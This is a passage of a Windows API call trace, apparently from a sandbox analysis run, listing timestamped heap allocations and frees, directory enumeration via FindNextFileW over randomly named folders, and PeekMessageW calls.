[0195.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.888] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0195.891] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2dce4250, ftCreationTime.dwHighDateTime=0x1d896ec, ftLastAccessTime.dwLowDateTime=0x45eff2e0, ftLastAccessTime.dwHighDateTime=0x1d8a31a, ftLastWriteTime.dwLowDateTime=0x45eff2e0, ftLastWriteTime.dwHighDateTime=0x1d8a31a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UovhOsbqK0eMsW0c", cAlternateFileName="UOVHOS~1")) returned 1 [0195.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0195.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x2ca5e50 [0195.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0195.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0195.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x38) returned 0x2cfe140 [0195.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0195.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0195.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91678 [0195.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0195.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ca5e50 | out: hHeap=0x620000) returned 1 [0195.893] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xde474710, ftCreationTime.dwHighDateTime=0x1d8a256, ftLastAccessTime.dwLowDateTime=0xc3454f10, ftLastAccessTime.dwHighDateTime=0x1d8a630, ftLastWriteTime.dwLowDateTime=0xc3454f10, ftLastWriteTime.dwHighDateTime=0x1d8a630, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YUyI2uqRriEqQVB sFMm", cAlternateFileName="YUYI2U~1")) returned 1 [0195.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0195.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91710 [0195.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x54) returned 0x2c3a5b0 [0195.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0195.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e917a8 [0195.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0195.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cfe140 | out: hHeap=0x620000) returned 1 [0195.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91678 [0195.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0195.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0195.894] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xde474710, ftCreationTime.dwHighDateTime=0x1d8a256, ftLastAccessTime.dwLowDateTime=0xc3454f10, ftLastAccessTime.dwHighDateTime=0x1d8a630, ftLastWriteTime.dwLowDateTime=0xc3454f10, ftLastWriteTime.dwHighDateTime=0x1d8a630, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YUyI2uqRriEqQVB sFMm", cAlternateFileName="YUYI2U~1")) returned 0 [0195.894] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0195.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0195.895] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0195.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaf50 [0195.895] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0195.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0195.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.910] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.910] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.910] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.910] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0195.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.923] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.923] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.923] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.930] 